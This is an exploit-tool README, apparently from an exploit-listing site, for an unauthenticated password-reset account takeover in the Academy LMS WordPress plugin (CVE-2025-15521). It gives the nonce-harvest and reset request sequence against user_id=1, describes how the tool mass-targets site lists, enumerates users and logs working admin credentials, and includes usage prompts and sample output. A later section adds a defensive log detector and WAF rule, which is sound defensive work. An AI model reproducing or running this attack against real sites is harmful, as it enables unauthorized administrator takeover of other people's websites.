## https://sploitus.com/exploit?id=A016274D-6A21-5FC4-AC8D-0AEB8C8BC356
# CVE-2025-15521
The Academy LMS – WordPress LMS Plugin for Complete eLearning Solution plugin for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 3.5.0.
```
_____ _____ _____ ___ ___ ___ ___ ___ ___ ___ ___ ___
| | | | __|___|_ | |_ | _|___|_ | | _| _|_ |_ |
| --| | | __|___| _| | | _|_ |___|_| |_|_ |_ | _|_| |_
|_____|\___/|_____| |___|___|___|___| |_____|___|___|___|_____|
```
[Telegram @KNxploited](https://t.me/KNxploited) · [Vulners](https://vulners.com/cve/CVE-2025-15521) · [NVD](https://nvd.nist.gov/vuln/detail/CVE-2025-15521) · [Python](https://python.org)
> 💡 Follow **[@KNxploited](https://t.me/KNxploited)**: CVE disclosures and working exploits, no delay.
---
## What is this
**CVE-2025-15521**: Unauthenticated account takeover via password reset in **Academy LMS ≤ 3.5.0**.
The plugin's reset handler authenticates the request using only a **publicly-exposed nonce** (`academy_nonce`) embedded in course pages. No token sent to the user's email. No session check. No identity validation. An attacker who reads any course page gets a valid nonce, then resets any account's password by supplying a `user_id`, including `user_id=1` (the site admin).
**CVSS 3.1: 9.8 Critical**, vector `AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H`
**CNA:** Wordfence
---
## How the vulnerability works
```
GET /course/any-course/
→ HTML contains: "academy_nonce": "a1b2c3d4e5"   ← public, no auth
POST /academy-retrieve-password/?user_id=1
new_password=
confirm_new_password=
security=a1b2c3d4e5   ← nonce accepted
→ Password for user_id=1 changed. No email. No confirmation.
```
The handler calls `wp_set_password()` after only verifying `wp_verify_nonce()` on a nonce that is broadcast to every visitor. There is no check that the requesting user owns the account being modified.
---
## What this script does
1. Crawls course pages to extract a live `academy_nonce`
2. Fires the reset handler for a target `user_id` with a chosen password
3. Enumerates usernames via `/?author=N` redirects and the REST API (`/wp-json/wp/v2/users`)
4. Attempts a strict login for each candidate:
   - Rejects known failure messages
   - Requires a `wordpress_logged_in` cookie
   - Requires real admin UI markers in `/wp-admin`, not just a 200 response
5. Writes confirmed access entries to an output file; nothing sensitive is printed to the terminal
---
## Requirements
```bash
pip install requests colorama urllib3
```
Python 3.8+ required. Python 3.10+ recommended.
---
## Usage
```bash
python CVE-2025-15521.py
```
You will be prompted for:
```
Targets list file (one URL per line): list.txt
Threads (concurrent sites) [5]: 10
Reset handler path [/academy-retrieve-password/]:
Course root path (key source) [/course/]:
Max /course/ subpages to scan per site [15]:
user_id to reset (handler target) [1]:
New password to set [adminSA]:
HTTP timeout (seconds) [10]:
Output file [scan_results/academy_access_success.txt]:
```
Targets file (one URL per line, scheme optional):
```
https://target1.com
target2.com
https://target3.com/lms
```
---
## Output
**Terminal**: one line per target, no credentials printed:
```
[14:02:11] [https://target.com] KEY: OK | RESET: OK | ACCESS: 1 HIT
[14:02:13] [https://target2.com] KEY: FAIL | RESET: - | ACCESS: 0 HIT
```
**File**: confirmed access entries only:
```
[2025-04-18T14:02:11] https://target.com - account=admin pass=adminSA
```
---
## Detection & Remediation
**For defenders:**
Block or monitor unauthenticated POST requests to the reset endpoint:
```
POST *academy-retrieve-password* with parameter: security=
```
Check the `rm_admin_order` / `academy_nonce` exposure in your theme's course page source. If the nonce is visible in the page source without being logged in, your version is affected.
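Added example, not part of the KNxploited tool or of the Academy LMS plugin: a small Python detector that applies the monitoring rule above to web-server access-log lines in Combined Log Format, plus a request-level predicate of the kind a WAF or a WordPress mu-plugin hook would evaluate. The log lines, IP addresses and timestamps are constructed for the example; the path marker `academy-retrieve-password` and the `security` / `user_id` parameter names come from the advisory. Standard access logs do not record POST bodies, so the `security=` field can only be matched where request bodies are logged (WAF, ModSecurity audit log, or an in-application hook); the access-log pass therefore keys on the POST method, the handler path and the `user_id` query parameter.

```python
"""Detect unauthenticated POSTs to the Academy LMS reset handler (defender-side example)."""
import re
from dataclasses import dataclass
from typing import Dict, Iterable, List, Optional
from urllib.parse import parse_qs, urlsplit

RESET_PATH_MARKER = "academy-retrieve-password"   # handler path from the advisory

# Combined Log Format as written by Apache/nginx by default. Bodies are not logged,
# so new_password= / security= are invisible here; the POST and ?user_id= are not.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) \S+'
    r'(?: "[^"]*" "(?P<ua>[^"]*)")?'
)

# Constructed sample log (example data, not captured from a real site).
SAMPLE_LOG = """\
203.0.113.5 - - [18/Apr/2025:14:02:09 +0000] "GET /course/intro-to-security/ HTTP/1.1" 200 48213 "-" "python-requests/2.31"
203.0.113.5 - - [18/Apr/2025:14:02:11 +0000] "POST /academy-retrieve-password/?user_id=1 HTTP/1.1" 302 0 "-" "python-requests/2.31"
198.51.100.20 - - [18/Apr/2025:14:05:40 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "https://example.com/wp-login.php" "Mozilla/5.0"
203.0.113.5 - - [18/Apr/2025:14:06:02 +0000] "POST /lms/academy-retrieve-password/?user_id=7 HTTP/1.1" 302 0 "-" "python-requests/2.31"
192.0.2.9 - - [18/Apr/2025:14:07:15 +0000] "GET /academy-retrieve-password/ HTTP/1.1" 200 1203 "-" "Mozilla/5.0"
"""


@dataclass
class ResetHit:
    ip: str
    timestamp: str
    path: str
    user_id: Optional[str]   # None when the POST carried no ?user_id= parameter
    status: str
    user_agent: str


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Split one Combined Log Format line into fields; None if it does not parse."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def find_reset_posts(lines: Iterable[str]) -> List[ResetHit]:
    """Return every POST whose path contains the reset-handler marker."""
    hits: List[ResetHit] = []
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["method"] != "POST":
            continue
        parts = urlsplit(rec["target"])
        if RESET_PATH_MARKER not in parts.path:
            continue
        user_id = parse_qs(parts.query).get("user_id", [None])[0]
        hits.append(ResetHit(rec["ip"], rec["ts"], parts.path, user_id,
                             rec["status"], rec["ua"] or "-"))
    return hits


def hits_per_source(hits: Iterable[ResetHit]) -> Dict[str, int]:
    """Count reset POSTs per client IP; a sweep over many user_ids stands out here."""
    counts: Dict[str, int] = {}
    for h in hits:
        counts[h.ip] = counts.get(h.ip, 0) + 1
    return counts


def is_unauthenticated_reset(method: str, target: str,
                             form: Dict[str, str], cookie_names: Iterable[str]) -> bool:
    """Request-level rule for a WAF or mu-plugin hook (hypothetical integration point):
    a POST to the reset handler carrying the `security` nonce field while the client
    presents no wordpress_logged_in_* cookie."""
    if method.upper() != "POST" or RESET_PATH_MARKER not in urlsplit(target).path:
        return False
    logged_in = any(c.startswith("wordpress_logged_in") for c in cookie_names)
    return "security" in form and not logged_in


if __name__ == "__main__":
    for hit in find_reset_posts(SAMPLE_LOG.splitlines()):
        print(f"[{hit.timestamp}] {hit.ip} POST {hit.path} user_id={hit.user_id} -> {hit.status}")
    print(hits_per_source(find_reset_posts(SAMPLE_LOG.splitlines())))
```

On an unpatched site every legitimate use of the handler is also an unauthenticated POST, so treat matches as review candidates rather than proof of compromise: the `user_id` values targeted (especially `1`), the number of hits per source address, and an automation user agent are what separate a forgotten-password request from a reset sweep. Cross-check any hit against the `user_id`'s last password-change time before forcing the resets listed below.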
**Immediate fix steps:**
- Update Academy LMS to a version above 3.5.0
- Temporarily disable the plugin if no patch is available
- Audit recently changed admin passwords
- Force password resets on all administrator accounts
- Implement email-based token verification for any password reset flow
---
## ⚠️ Disclaimer
This tool is for authorized security research and penetration testing only.
Only run it against systems you own or have explicit written permission to test.
The author accepts no liability for unauthorized or illegal use.
Unauthorized use violates CFAA, CMA, EU Directive 2013/40/EU, Saudi Anti-Cyber Crime Law No. M/17, and equivalent laws worldwide.
---
**By Nxploited (Khaled Alenazi)**
[t.me/KNxploited](https://t.me/KNxploited) · [github.com/Nxploited](https://github.com/Nxploited)
> Follow [@KNxploited](https://t.me/KNxploited) on Telegram for the latest CVEs and exploit releases.